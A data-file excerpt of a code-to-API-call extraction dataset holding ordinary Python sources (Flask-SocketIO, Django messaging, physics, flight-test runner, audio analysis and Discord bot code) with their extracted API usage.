code
stringlengths 22
1.05M
| apis
listlengths 1
3.31k
| extract_api
stringlengths 75
3.25M
|
|---|---|---|
'''server/app.py - main api app declaration'''
from flask import Flask, jsonify, request, send_from_directory
from flask_cors import CORS, cross_origin
from flask_socketio import SocketIO, join_room
import os
'''Main wrapper for app creation'''
app = Flask(__name__, static_folder='./build')
socketio = SocketIO(app, cors_allowed_origins='*')
CORS(app)
# Active users list
activeUsers = []
##
# Sockets
##
@socketio.on('join')
def handleJoin(user):
activeUsers.append({'username': user["username"], 'sid': request.sid, 'emoji': user["emoji"]})
join_room(request.sid)
socketio.emit('update', activeUsers, broadcast=True)
@socketio.on('send')
def handleTransfer(data):
socketio.emit('update', activeUsers, broadcast=True)
@socketio.on('upload')
def handleTransfer(data):
socketio.emit('download', data, room=data["receiver"])
@socketio.on('high')
def handleHigh(data):
socketio.emit('five', data, room=data["sender"])
@socketio.on('disconnect')
def handleDisc():
for key in activeUsers:
sid = key["sid"]
if (sid == request.sid) : activeUsers.pop(activeUsers.index(key))
socketio.emit('update', activeUsers, broadcast=True)
##
# API routes
##
##
# View route
##
@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def index(path):
'''Return index.html for all non-api routes'''
#pylint: disable=unused-argument
return send_from_directory(app.static_folder, 'index.html')
##
# Run App
##
socketio.run(app)
|
[
"flask_cors.CORS",
"flask.Flask",
"flask_socketio.join_room",
"flask_socketio.SocketIO",
"flask.send_from_directory"
] |
[((252, 292), 'flask.Flask', 'Flask', (['__name__'], {'static_folder': '"""./build"""'}), "(__name__, static_folder='./build')\n", (257, 292), False, 'from flask import Flask, jsonify, request, send_from_directory\n'), ((304, 343), 'flask_socketio.SocketIO', 'SocketIO', (['app'], {'cors_allowed_origins': '"""*"""'}), "(app, cors_allowed_origins='*')\n", (312, 343), False, 'from flask_socketio import SocketIO, join_room\n'), ((344, 353), 'flask_cors.CORS', 'CORS', (['app'], {}), '(app)\n', (348, 353), False, 'from flask_cors import CORS, cross_origin\n'), ((552, 574), 'flask_socketio.join_room', 'join_room', (['request.sid'], {}), '(request.sid)\n', (561, 574), False, 'from flask_socketio import SocketIO, join_room\n'), ((1371, 1423), 'flask.send_from_directory', 'send_from_directory', (['app.static_folder', '"""index.html"""'], {}), "(app.static_folder, 'index.html')\n", (1390, 1423), False, 'from flask import Flask, jsonify, request, send_from_directory\n')]
|
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render_to_response
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.contrib.auth.models import User
from django.contrib.auth.decorators import login_required
from django_messaging.models import DmMessage,DmUser
from django_messaging.views import index
@login_required
def send_pm(request,dm_user_id):
contact_username=DmUser.objects.get(id=dm_user_id).user.username
return render_to_response('messaging/send_pm.html',{'contact_id':dm_user_id,'contact_username':contact_username})
@login_required
def post_pm(request,dm_user_id):
profile=request.user.get_profile()
to_user=DmUser.objects.get(id=dm_user_id)
profile.send_message(to_user=to_user,message=request.GET['pm'])
return index(request)
@login_required
def read_pm(request,message_id=None,first=None):
if first:
message=request.user.get_profile().get_first_unreaded_message()
else:
message=request.user.get_profile().get_message(message_id)
if not message:
return HttpResponse('Impossible de lire le message')
#~ flag the message as readed
if not message.readed:
message.readed=True
#~ save data
message.save()
message.from_user_username=message.from_user.user.username
return render_to_response('messaging/read_pm.html',{'message':message})
@login_required
def read_first_pm(request):
return read_pm(request,first=True)
@login_required
def load_num_msgs(request):
num_messages=request.user.get_profile().count_unreaded_messages()
has_message=False
if num_messages>0:
has_message=True
return render_to_response('messaging/num_messages.html',{'has_message':has_message,'num_messages':num_messages,'media_url':settings.MEDIA_URL})
@login_required
def load_msgs_list(request):
profile=request.user.get_profile()
has_messages=False
messages_q=profile.get_messages().order_by('-date')
if len(list(messages_q))>0:
has_messages=True
messages=[]
for message in messages_q:
message.from_username=message.from_user.user.username
messages.append(message)
return render_to_response('messaging/messages_list.html',{'messages':messages,'has_messages':has_messages,'media_url':settings.MEDIA_URL})
@login_required
def delete_message(request,message_id):
profile=request.user.get_profile()
profile.delete_message(int(message_id))
return HttpResponseRedirect('/messaging/load_msgs_list/')
|
[
"django.shortcuts.render_to_response",
"django.http.HttpResponse",
"django_messaging.views.index",
"django_messaging.models.DmUser.objects.get",
"django.http.HttpResponseRedirect"
] |
[((517, 631), 'django.shortcuts.render_to_response', 'render_to_response', (['"""messaging/send_pm.html"""', "{'contact_id': dm_user_id, 'contact_username': contact_username}"], {}), "('messaging/send_pm.html', {'contact_id': dm_user_id,\n 'contact_username': contact_username})\n", (535, 631), False, 'from django.shortcuts import render_to_response\n'), ((721, 754), 'django_messaging.models.DmUser.objects.get', 'DmUser.objects.get', ([], {'id': 'dm_user_id'}), '(id=dm_user_id)\n', (739, 754), False, 'from django_messaging.models import DmMessage, DmUser\n'), ((830, 844), 'django_messaging.views.index', 'index', (['request'], {}), '(request)\n', (835, 844), False, 'from django_messaging.views import index\n'), ((1326, 1392), 'django.shortcuts.render_to_response', 'render_to_response', (['"""messaging/read_pm.html"""', "{'message': message}"], {}), "('messaging/read_pm.html', {'message': message})\n", (1344, 1392), False, 'from django.shortcuts import render_to_response\n'), ((1657, 1808), 'django.shortcuts.render_to_response', 'render_to_response', (['"""messaging/num_messages.html"""', "{'has_message': has_message, 'num_messages': num_messages, 'media_url':\n settings.MEDIA_URL}"], {}), "('messaging/num_messages.html', {'has_message':\n has_message, 'num_messages': num_messages, 'media_url': settings.MEDIA_URL}\n )\n", (1675, 1808), False, 'from django.shortcuts import render_to_response\n'), ((2143, 2284), 'django.shortcuts.render_to_response', 'render_to_response', (['"""messaging/messages_list.html"""', "{'messages': messages, 'has_messages': has_messages, 'media_url': settings.\n MEDIA_URL}"], {}), "('messaging/messages_list.html', {'messages': messages,\n 'has_messages': has_messages, 'media_url': settings.MEDIA_URL})\n", (2161, 2284), False, 'from django.shortcuts import render_to_response\n'), ((2422, 2472), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', (['"""/messaging/load_msgs_list/"""'], {}), "('/messaging/load_msgs_list/')\n", (2442, 2472), False, 'from django.http import HttpResponse, HttpResponseRedirect\n'), ((1091, 1136), 'django.http.HttpResponse', 'HttpResponse', (['"""Impossible de lire le message"""'], {}), "('Impossible de lire le message')\n", (1103, 1136), False, 'from django.http import HttpResponse, HttpResponseRedirect\n'), ((460, 493), 'django_messaging.models.DmUser.objects.get', 'DmUser.objects.get', ([], {'id': 'dm_user_id'}), '(id=dm_user_id)\n', (478, 493), False, 'from django_messaging.models import DmMessage, DmUser\n')]
|
# Generated by Django 3.2.8 on 2021-10-31 15:19
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('assesments', '0011_auto_20211031_1218'),
]
operations = [
migrations.RenameField(
model_name='taker',
old_name='api_user',
new_name='user',
),
]
|
[
"django.db.migrations.RenameField"
] |
[((230, 315), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""taker"""', 'old_name': '"""api_user"""', 'new_name': '"""user"""'}), "(model_name='taker', old_name='api_user', new_name='user'\n )\n", (252, 315), False, 'from django.db import migrations\n')]
|
""" obtain the static field from a set of charges and
dipoles at polarizable points.
"""
import numpy
from .tensor import T
from .mulmom import MulMom as M
def get_static_field_from_file(potential, filename):
f = open(filename, 'r')
field = []
for i, line in enumerate(f):
d = line.split()
if i == 0:
continue
else:
field.append(list(map(float, d)))
f.close()
return numpy.ravel(field)
def get_static_field(potential, **kwargs):
"""
"""
verbose = kwargs.get('verbose', False)
filename = kwargs.pop('filename', None)
F_static = numpy.zeros(3 * potential.npols)
if filename is not None:
if verbose:
print("Loading static field from file '{0}'".format(filename))
F_static = get_static_field_from_file(potential, filename)
else:
try:
from .field import static_field
ex = numpy.array([potential.exclusion_list[k] for k in range(len(potential.exclusion_list))])
q = numpy.zeros(potential.nsites)
d = numpy.zeros((potential.nsites,3))
multipoles = potential.multipoles
if 0 in multipoles.keys():
q = numpy.array([q[0] for q in multipoles[0]])
if 1 in multipoles.keys():
d = numpy.array([d for d in multipoles[1]])
F_static = static_field(potential.npols, potential.coordinates, potential.has_alpha, ex, q, d)
except ModuleNotFoundError:
if verbose:
print("INFO: static field calculated using (slow) python version.")
offset = 0
for isite in range(potential.nsites):
itensor = potential.has_alpha[isite]
is_polarizable_point = (itensor > -1)
Ri = potential.coordinates[isite]
if is_polarizable_point:
iexclusion_list = potential.exclusion_list[isite]
for jsite in range(potential.nsites):
if jsite == isite:
continue
if jsite in iexclusion_list:
continue
jtensor = potential.has_alpha[jsite]
js_polarizable_point = (jtensor > -1)
Rj = potential.coordinates[jsite]
dRij = Rj - Ri
T1 = T(1, dRij)
try:
M0 = M(*potential.multipoles[0][jsite])
except KeyError:
F0 = numpy.zeros(3)
else:
F0 = numpy.array(M0 * T1).ravel()
finally:
F_static[offset:offset + 3] -= F0
T2 = T(2, dRij)
try:
M1 = M(*potential.multipoles[1][jsite])
except KeyError:
F1 = numpy.zeros(3)
else:
F1 = numpy.array(M1 * T2)
finally:
F_static[offset:offset + 3] += F1
T3 = T(3, dRij)
try:
M2 = M(*potential.multipoles[2][jsite])
except KeyError:
F2 = numpy.zeros(3)
else:
F2 = numpy.array(M2 * T3)
finally:
F_static[offset:offset + 3] += F2
offset += 3
return F_static
|
[
"numpy.array",
"numpy.zeros",
"numpy.ravel"
] |
[((441, 459), 'numpy.ravel', 'numpy.ravel', (['field'], {}), '(field)\n', (452, 459), False, 'import numpy\n'), ((625, 657), 'numpy.zeros', 'numpy.zeros', (['(3 * potential.npols)'], {}), '(3 * potential.npols)\n', (636, 657), False, 'import numpy\n'), ((1041, 1070), 'numpy.zeros', 'numpy.zeros', (['potential.nsites'], {}), '(potential.nsites)\n', (1052, 1070), False, 'import numpy\n'), ((1087, 1121), 'numpy.zeros', 'numpy.zeros', (['(potential.nsites, 3)'], {}), '((potential.nsites, 3))\n', (1098, 1121), False, 'import numpy\n'), ((1227, 1269), 'numpy.array', 'numpy.array', (['[q[0] for q in multipoles[0]]'], {}), '([q[0] for q in multipoles[0]])\n', (1238, 1269), False, 'import numpy\n'), ((1329, 1368), 'numpy.array', 'numpy.array', (['[d for d in multipoles[1]]'], {}), '([d for d in multipoles[1]])\n', (1340, 1368), False, 'import numpy\n'), ((3118, 3138), 'numpy.array', 'numpy.array', (['(M1 * T2)'], {}), '(M1 * T2)\n', (3129, 3138), False, 'import numpy\n'), ((3524, 3544), 'numpy.array', 'numpy.array', (['(M2 * T3)'], {}), '(M2 * T3)\n', (3535, 3544), False, 'import numpy\n'), ((2626, 2640), 'numpy.zeros', 'numpy.zeros', (['(3)'], {}), '(3)\n', (2637, 2640), False, 'import numpy\n'), ((3040, 3054), 'numpy.zeros', 'numpy.zeros', (['(3)'], {}), '(3)\n', (3051, 3054), False, 'import numpy\n'), ((3446, 3460), 'numpy.zeros', 'numpy.zeros', (['(3)'], {}), '(3)\n', (3457, 3460), False, 'import numpy\n'), ((2704, 2724), 'numpy.array', 'numpy.array', (['(M0 * T1)'], {}), '(M0 * T1)\n', (2715, 2724), False, 'import numpy\n')]
|
import typing
from typing import Dict, Optional
from monitoring.monitorlib.clients.scd_automated_testing import QueryError
from monitoring.monitorlib.scd_automated_testing.scd_injection_api import (
InjectFlightResponse,
)
from monitoring.uss_qualifier.common_data_definitions import Severity
from monitoring.uss_qualifier.scd.configuration import SCDQualifierTestConfiguration
from monitoring.uss_qualifier.scd.data_interfaces import (
AutomatedTest,
TestStep,
FlightInjectionAttempt,
)
from monitoring.uss_qualifier.scd.executor.errors import TestRunnerError
from monitoring.uss_qualifier.scd.executor.report_recorder import ReportRecorder
from monitoring.uss_qualifier.scd.executor.target import TestTarget
from monitoring.uss_qualifier.scd.executor.test_steps import (
inject_flight,
delete_flight,
)
from monitoring.uss_qualifier.scd.reports import (
Report,
Issue,
AutomatedTestContext,
TestStepReference,
TestPhase,
)
# TODO: Replace print by logging
class TestRunner:
"""A class to run automated test steps for a specific combination of targets per uss role"""
def __init__(
self,
context: AutomatedTestContext,
automated_test: AutomatedTest,
targets: Dict[str, TestTarget],
dss_target: Optional[TestTarget],
report: Report,
):
self.context = context
self.automated_test = automated_test
self.targets = targets
self.dss_target = dss_target
self.report_recorder = ReportRecorder(report, self.context)
def get_scd_configuration(self) -> SCDQualifierTestConfiguration:
return SCDQualifierTestConfiguration(
injection_targets=list(map(lambda t: t.config, self.targets.values()))
)
def run_automated_test(self):
for i, step in enumerate(self.automated_test.steps):
print("[SCD] Running step {}: {}".format(i, step.name))
self.execute_step(step, i)
def teardown(self):
"""Delete resources created by this test runner."""
print("[SCD] Teardown {}".format(self.automated_test.name))
cleanup_test_step = 0
for role, target in self.targets.items():
flight_names = target.managed_flights()
for flight_name in flight_names:
print(
"[SCD] - Deleting {} flights for target {}.".format(
len(flight_names), target.name
)
)
step_ref = TestStepReference(
name="Clean up flight {} in {}".format(flight_name, target.name),
index=cleanup_test_step,
phase=TestPhase.Cleanup,
)
try:
resp, query = target.delete_flight(flight_name)
self.report_recorder.capture_interaction(
step_ref, query, "Remove flight during test cleanup"
)
except QueryError as e:
interaction_id = self.report_recorder.capture_interaction(
step_ref, e.query, "Remove flight during test cleanup"
)
self.report_recorder.capture_deletion_unknown_issue(
interaction_id=interaction_id,
summary="Deletion request for flight {} was unsuccessful".format(
flight_name
),
details="Deletion attempt failed with status {}.".format(
e.query.status_code
),
flight_name=flight_name,
target_name=target.name,
uss_role=role,
)
print(
"[SCD] Error: Unable to delete flight {} during teardown".format(
flight_name
)
)
cleanup_test_step = cleanup_test_step + 1
def execute_step(self, step: TestStep, step_index: int):
target = self.get_target(step)
if target is None:
self.print_targets_state()
raise RuntimeError(
"[SCD] Error: Unable to identify the target managing flight {}".format(
step.inject_flight.name
if "inject_flight" in step
else step.delete_flight.flight_name
)
)
step_ref = TestStepReference(
name=step.name, index=step_index, phase=TestPhase.Test
)
if "inject_flight" in step:
inject_flight.execute(self, step, step_ref, target)
elif "delete_flight" in step:
delete_flight.execute(self, step, step_ref, target)
else:
raise RuntimeError(
"[SCD] Error: Unable to identify the action to execute for step {}".format(
step.name
)
)
print("[SCD] Step {} COMPLETED".format(step.name))
def get_managing_target(self, flight_name: str) -> typing.Optional[TestTarget]:
"""Returns the managing target which created a flight"""
for role, target in self.targets.items():
if target.is_managing_flight(flight_name):
return target
return None
def get_target(self, step: TestStep) -> typing.Optional[TestTarget]:
"""Returns the target which should be called in the TestStep"""
if "inject_flight" in step:
return self.targets[step.inject_flight.injection_target.uss_role]
elif "delete_flight" in step:
return self.get_managing_target(step.delete_flight.flight_name)
else:
raise NotImplementedError(
"Unsupported step. A Test Step shall contain either a inject_flight or a delete_flight object."
)
def get_target_role(self, target_name):
results = list(filter(lambda x: x[1].name == target_name, self.targets.items()))
return results[0] if len(results) > 0 else None
def evaluate_inject_flight_response(
self,
interaction_id: str,
target: TestTarget,
attempt: FlightInjectionAttempt,
resp: InjectFlightResponse,
) -> typing.Optional[Issue]:
if resp.result not in attempt.known_responses.acceptable_results:
print(
"[SCD] Result: ERROR. Received {}, expected one of {}. Reason: {}".format(
resp.result,
attempt.known_responses.acceptable_results,
resp.get("notes", None),
)
)
known_issue = attempt.known_responses.incorrect_result_details.get(
resp.result, None
)
if known_issue:
issue = self.report_recorder.capture_injection_issue(
interaction_id=interaction_id,
target_name=target.name,
attempt=attempt,
known_issue=known_issue,
)
if known_issue.severity != Severity.Low:
raise TestRunnerError(
"Failed attempt to inject flight {}: {}".format(
attempt.name, known_issue.summary
),
issue,
)
else:
issue = self.report_recorder.capture_injection_unknown_issue(
interaction_id=interaction_id,
summary="Injection request was unsuccessful",
details="Injection attempt failed with unknown response {}".format(
resp.result
),
target_name=target.name,
attempt=attempt,
)
raise TestRunnerError(
"Unsuccessful attempt to inject flight {}".format(attempt.name),
issue,
)
return None
def print_targets_state(self):
print("[SCD] Targets States:")
for name, target in self.targets.items():
print(f"[SCD] - {name}: {target.created_flight_ids}")
|
[
"monitoring.uss_qualifier.scd.executor.report_recorder.ReportRecorder",
"monitoring.uss_qualifier.scd.executor.test_steps.inject_flight.execute",
"monitoring.uss_qualifier.scd.executor.test_steps.delete_flight.execute",
"monitoring.uss_qualifier.scd.reports.TestStepReference"
] |
[((1519, 1555), 'monitoring.uss_qualifier.scd.executor.report_recorder.ReportRecorder', 'ReportRecorder', (['report', 'self.context'], {}), '(report, self.context)\n', (1533, 1555), False, 'from monitoring.uss_qualifier.scd.executor.report_recorder import ReportRecorder\n'), ((4560, 4633), 'monitoring.uss_qualifier.scd.reports.TestStepReference', 'TestStepReference', ([], {'name': 'step.name', 'index': 'step_index', 'phase': 'TestPhase.Test'}), '(name=step.name, index=step_index, phase=TestPhase.Test)\n', (4577, 4633), False, 'from monitoring.uss_qualifier.scd.reports import Report, Issue, AutomatedTestContext, TestStepReference, TestPhase\n'), ((4705, 4756), 'monitoring.uss_qualifier.scd.executor.test_steps.inject_flight.execute', 'inject_flight.execute', (['self', 'step', 'step_ref', 'target'], {}), '(self, step, step_ref, target)\n', (4726, 4756), False, 'from monitoring.uss_qualifier.scd.executor.test_steps import inject_flight, delete_flight\n'), ((4807, 4858), 'monitoring.uss_qualifier.scd.executor.test_steps.delete_flight.execute', 'delete_flight.execute', (['self', 'step', 'step_ref', 'target'], {}), '(self, step, step_ref, target)\n', (4828, 4858), False, 'from monitoring.uss_qualifier.scd.executor.test_steps import inject_flight, delete_flight\n')]
|
import sys
import os
import json
import numpy as np
import glob
import argparse
import pdb
import f0dl_bernox
def compute_f0_shift_curve(expt_dict, filter_key, filter_value, f0_min=80.0, f0_max=1e3):
'''
'''
# Identify trials where filter_key = filter_value and stimulus is in f0 range
indexes = expt_dict[filter_key] == filter_value
indexes = np.logical_and(indexes, np.logical_and(expt_dict['f0'] >= f0_min, expt_dict['f0'] <= f0_max))
# Compute f0 shifts
f0_shift = expt_dict['f0_shift'][indexes]
f0_pred_shift = (expt_dict['f0_pred'][indexes] - expt_dict['f0'][indexes]) / expt_dict['f0'][indexes]
# For each unique f0 shift, compute the mean, median, stddev predicted f0 shift
f0_shift_unique = np.unique(f0_shift)
f0_pred_shift_mean = np.zeros_like(f0_shift_unique)
f0_pred_shift_median = np.zeros_like(f0_shift_unique)
f0_pred_shift_stddev = np.zeros_like(f0_shift_unique)
for idx, f0_shift_value in enumerate(f0_shift_unique):
current_value_indexes = f0_shift == f0_shift_value
f0_pred_shift_mean[idx] = np.mean(f0_pred_shift[current_value_indexes])
f0_pred_shift_median[idx] = np.median(f0_pred_shift[current_value_indexes])
f0_pred_shift_stddev[idx] = np.std(f0_pred_shift[current_value_indexes])
# Return results in dictionary (units converted to percent)
sub_results_dict = {
'f0_shift': 100.0 * f0_shift_unique,
'f0_pred_shift_mean': 100.0 * f0_pred_shift_mean,
'f0_pred_shift_median': 100.0 * f0_pred_shift_median,
'f0_pred_shift_stddev': 100.0 * f0_pred_shift_stddev,
}
return sub_results_dict
def run_f0experiment_freq_shifted(json_fn, filter_key='spectral_envelope_centered_harmonic',
f0_label_pred_key='f0_label:labels_pred',
f0_label_true_key='f0_label:labels_true',
f0_label_prob_key='f0_label:probs_out',
kwargs_f0_prior={},
f0_min=None,
f0_max=None):
'''
'''
# Load JSON file of model predictions into `expt_dict`
metadata_key_list = [
'f0',
'f0_shift',
'spectral_envelope_centered_harmonic',
'spectral_envelope_bandwidth_in_harmonics',
]
expt_dict = f0dl_bernox.load_f0_expt_dict_from_json(json_fn,
f0_label_true_key=f0_label_true_key,
f0_label_pred_key=f0_label_pred_key,
f0_label_prob_key=f0_label_prob_key,
metadata_key_list=metadata_key_list)
expt_dict = f0dl_bernox.add_f0_estimates_to_expt_dict(expt_dict,
f0_label_true_key=f0_label_true_key,
f0_label_pred_key=f0_label_pred_key,
kwargs_f0_prior=kwargs_f0_prior)
# Initialize dictionary to hold psychophysical results
if f0_min is None: f0_min = np.min(expt_dict['f0'])
if f0_max is None: f0_max = np.max(expt_dict['f0'])
results_dict = {filter_key:{}, 'f0_min':f0_min, 'f0_max':f0_max}
for filter_value in np.unique(expt_dict[filter_key]):
results_dict[filter_key][int(filter_value)] = compute_f0_shift_curve(expt_dict,
filter_key,
filter_value,
f0_min=f0_min,
f0_max=f0_max)
# Return dictionary of psychophysical experiment results
return results_dict
def main(json_eval_fn, json_results_dict_fn=None, save_results_to_file=False,
filter_key='spectral_envelope_centered_harmonic',
f0_label_pred_key='f0_label:labels_pred',
f0_label_true_key='f0_label:labels_true',
f0_label_prob_key='f0_label:probs_out',
kwargs_f0_prior={},
f0_min=None,
f0_max=None):
'''
'''
# Run the Moore and Moore (2003) freq-shifted complexes experiment; results stored in results_dict
results_dict = run_f0experiment_freq_shifted(json_eval_fn,
filter_key=filter_key,
f0_label_pred_key=f0_label_pred_key,
f0_label_true_key=f0_label_true_key,
f0_label_prob_key=f0_label_prob_key,
kwargs_f0_prior=kwargs_f0_prior,
f0_min=f0_min,
f0_max=f0_max)
results_dict['json_eval_fn'] = json_eval_fn
results_dict['kwargs_f0_prior'] = kwargs_f0_prior
# If specified, save results_dict to file
if save_results_to_file:
# Check filename for results_dict
if json_results_dict_fn is None:
json_results_dict_fn = json_eval_fn.replace('.json', '_results_dict.json')
assert not json_results_dict_fn == json_eval_fn, "json_results_dict_fn must not overwrite json_eval_fn"
# Define helper class to JSON serialize the results_dict
class NumpyEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.ndarray): return obj.tolist()
if isinstance(obj, np.int64): return int(obj)
return json.JSONEncoder.default(self, obj)
# Write results_dict to json_results_dict_fn
with open(json_results_dict_fn, 'w') as f: json.dump(results_dict, f, cls=NumpyEncoder)
print('[END] wrote results_dict to {}'.format(json_results_dict_fn))
return results_dict
if __name__ == "__main__":
'''
'''
parser = argparse.ArgumentParser(description="run Moore and Moore (2003) freq-shifted complexes experiment")
parser.add_argument('-r', '--regex_json_eval_fn', type=str, default=None,
help='regex that globs list of json_eval_fn to process')
parser.add_argument('-j', '--job_idx', type=int, default=None,
help='job index used to select json_eval_fn from list')
parser.add_argument('-p', '--prior_range_in_octaves', type=float, default=0,
help='sets octave_range in `kwargs_f0_prior`: [#, #]')
parsed_args_dict = vars(parser.parse_args())
assert parsed_args_dict['regex_json_eval_fn'] is not None, "regex_json_eval_fn is a required argument"
assert parsed_args_dict['job_idx'] is not None, "job_idx is a required argument"
list_json_eval_fn = sorted(glob.glob(parsed_args_dict['regex_json_eval_fn']))
json_eval_fn = list_json_eval_fn[parsed_args_dict['job_idx']]
print('Processing file {} of {}'.format(parsed_args_dict['job_idx'], len(list_json_eval_fn)))
print('Processing file: {}'.format(json_eval_fn))
if parsed_args_dict['prior_range_in_octaves'] > 0:
kwargs_f0_prior = {
'f0_label_prob_key': 'f0_label:probs_out',
'f0_prior_ref_key': 'f0',
'octave_range': [
-parsed_args_dict['prior_range_in_octaves'],
parsed_args_dict['prior_range_in_octaves']
],
}
else:
kwargs_f0_prior = {}
main(json_eval_fn, save_results_to_file=True, kwargs_f0_prior=kwargs_f0_prior)
|
[
"json.dump",
"numpy.zeros_like",
"f0dl_bernox.add_f0_estimates_to_expt_dict",
"argparse.ArgumentParser",
"numpy.logical_and",
"numpy.median",
"numpy.std",
"numpy.min",
"numpy.mean",
"f0dl_bernox.load_f0_expt_dict_from_json",
"numpy.max",
"glob.glob",
"json.JSONEncoder.default",
"numpy.unique"
] |
[((744, 763), 'numpy.unique', 'np.unique', (['f0_shift'], {}), '(f0_shift)\n', (753, 763), True, 'import numpy as np\n'), ((789, 819), 'numpy.zeros_like', 'np.zeros_like', (['f0_shift_unique'], {}), '(f0_shift_unique)\n', (802, 819), True, 'import numpy as np\n'), ((847, 877), 'numpy.zeros_like', 'np.zeros_like', (['f0_shift_unique'], {}), '(f0_shift_unique)\n', (860, 877), True, 'import numpy as np\n'), ((905, 935), 'numpy.zeros_like', 'np.zeros_like', (['f0_shift_unique'], {}), '(f0_shift_unique)\n', (918, 935), True, 'import numpy as np\n'), ((2375, 2580), 'f0dl_bernox.load_f0_expt_dict_from_json', 'f0dl_bernox.load_f0_expt_dict_from_json', (['json_fn'], {'f0_label_true_key': 'f0_label_true_key', 'f0_label_pred_key': 'f0_label_pred_key', 'f0_label_prob_key': 'f0_label_prob_key', 'metadata_key_list': 'metadata_key_list'}), '(json_fn, f0_label_true_key=\n f0_label_true_key, f0_label_pred_key=f0_label_pred_key,\n f0_label_prob_key=f0_label_prob_key, metadata_key_list=metadata_key_list)\n', (2414, 2580), False, 'import f0dl_bernox\n'), ((2812, 2981), 'f0dl_bernox.add_f0_estimates_to_expt_dict', 'f0dl_bernox.add_f0_estimates_to_expt_dict', (['expt_dict'], {'f0_label_true_key': 'f0_label_true_key', 'f0_label_pred_key': 'f0_label_pred_key', 'kwargs_f0_prior': 'kwargs_f0_prior'}), '(expt_dict, f0_label_true_key=\n f0_label_true_key, f0_label_pred_key=f0_label_pred_key, kwargs_f0_prior\n =kwargs_f0_prior)\n', (2853, 2981), False, 'import f0dl_bernox\n'), ((3410, 3442), 'numpy.unique', 'np.unique', (['expt_dict[filter_key]'], {}), '(expt_dict[filter_key])\n', (3419, 3442), True, 'import numpy as np\n'), ((6172, 6276), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""run Moore and Moore (2003) freq-shifted complexes experiment"""'}), "(description=\n 'run Moore and Moore (2003) freq-shifted complexes experiment')\n", (6195, 6276), False, 'import argparse\n'), ((391, 459), 'numpy.logical_and', 'np.logical_and', (["(expt_dict['f0'] >= f0_min)", "(expt_dict['f0'] <= f0_max)"], {}), "(expt_dict['f0'] >= f0_min, expt_dict['f0'] <= f0_max)\n", (405, 459), True, 'import numpy as np\n'), ((1088, 1133), 'numpy.mean', 'np.mean', (['f0_pred_shift[current_value_indexes]'], {}), '(f0_pred_shift[current_value_indexes])\n', (1095, 1133), True, 'import numpy as np\n'), ((1170, 1217), 'numpy.median', 'np.median', (['f0_pred_shift[current_value_indexes]'], {}), '(f0_pred_shift[current_value_indexes])\n', (1179, 1217), True, 'import numpy as np\n'), ((1254, 1298), 'numpy.std', 'np.std', (['f0_pred_shift[current_value_indexes]'], {}), '(f0_pred_shift[current_value_indexes])\n', (1260, 1298), True, 'import numpy as np\n'), ((3237, 3260), 'numpy.min', 'np.min', (["expt_dict['f0']"], {}), "(expt_dict['f0'])\n", (3243, 3260), True, 'import numpy as np\n'), ((3293, 3316), 'numpy.max', 'np.max', (["expt_dict['f0']"], {}), "(expt_dict['f0'])\n", (3299, 3316), True, 'import numpy as np\n'), ((7010, 7059), 'glob.glob', 'glob.glob', (["parsed_args_dict['regex_json_eval_fn']"], {}), "(parsed_args_dict['regex_json_eval_fn'])\n", (7019, 7059), False, 'import glob\n'), ((5968, 6012), 'json.dump', 'json.dump', (['results_dict', 'f'], {'cls': 'NumpyEncoder'}), '(results_dict, f, cls=NumpyEncoder)\n', (5977, 6012), False, 'import json\n'), ((5828, 5863), 'json.JSONEncoder.default', 'json.JSONEncoder.default', (['self', 'obj'], {}), '(self, obj)\n', (5852, 5863), False, 'import json\n')]
|
import FWCore.ParameterSet.Config as cms
from RecoLocalMuon.GEMRecHit.gemRecHits_cfi import *
from RecoLocalMuon.GEMSegment.gemSegments_cfi import *
gemLocalRecoTask = cms.Task(gemRecHits,gemSegments)
gemLocalReco = cms.Sequence(gemLocalRecoTask)
|
[
"FWCore.ParameterSet.Config.Sequence",
"FWCore.ParameterSet.Config.Task"
] |
[((170, 203), 'FWCore.ParameterSet.Config.Task', 'cms.Task', (['gemRecHits', 'gemSegments'], {}), '(gemRecHits, gemSegments)\n', (178, 203), True, 'import FWCore.ParameterSet.Config as cms\n'), ((218, 248), 'FWCore.ParameterSet.Config.Sequence', 'cms.Sequence', (['gemLocalRecoTask'], {}), '(gemLocalRecoTask)\n', (230, 248), True, 'import FWCore.ParameterSet.Config as cms\n')]
|
import aiohttp
import discord
from discord.ext import commands
from db_utils.handle_conn import HandleConn
from tle.cogs.util import codeforces_api as cf
class Roles(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.ranks = [
'Expert', 'Candidate Master', 'Master', 'International Master',
'Grandmaster', 'International Grandmaster', 'Legendary Grandmaster'
]
async def FetchRoles(self, ctx):
converter = commands.RoleConverter()
rank2role = {}
for r in self.ranks:
rank2role[r.lower()] = await converter.convert(ctx, r)
return rank2role
@commands.command(brief='update roles (admin-only)')
@commands.has_role('Admin')
async def updateroles(self, ctx):
"""update roles"""
try:
rank2role = await self.FetchRoles(ctx)
except:
await ctx.send('error fetching roles!')
return
try:
conn = HandleConn('handles.db')
res = conn.getallhandles()
inforesp = await cf.user.info(handles=[t[1] for t in res])
await ctx.send('caching handles...')
try:
for i, r in enumerate(inforesp):
conn.cachehandle(res[i][1], r['rating'], r['titlePhoto'])
except Exception as e:
print(e)
conn.close()
except:
conn.close()
await ctx.send('error getting data from cf')
return
await ctx.send('updating roles...')
try:
converter = commands.MemberConverter()
for i, r in enumerate(inforesp):
try:
member = await converter.convert(ctx, res[i][0])
rank = r['rank'].lower()
rm_list = []
add = True
for role in member.roles:
name = role.name.lower()
if name == rank: add = False
elif name in rank2role: rm_list.append(role)
if rm_list:
await member.remove_roles(*rm_list)
if add:
await member.add_roles(rank2role[rank])
except Exception as e:
print(e)
msg = 'update roles completed'
except Exception as e:
msg = 'updateroles error!'
print(e)
await ctx.send(msg)
def setup(bot):
bot.add_cog(Roles(bot))
"""
{'expert': '555971731232391179', 'candidate master': '555972443693383700', 'master': '555972496558653441', 'international master': '555973490407243786', 'grandmaster': '555972556088279040', 'international grandmaster': '555972612245946380', 'legendary grandmaster': '555972689869668382'}
"""
|
[
"discord.ext.commands.command",
"discord.ext.commands.RoleConverter",
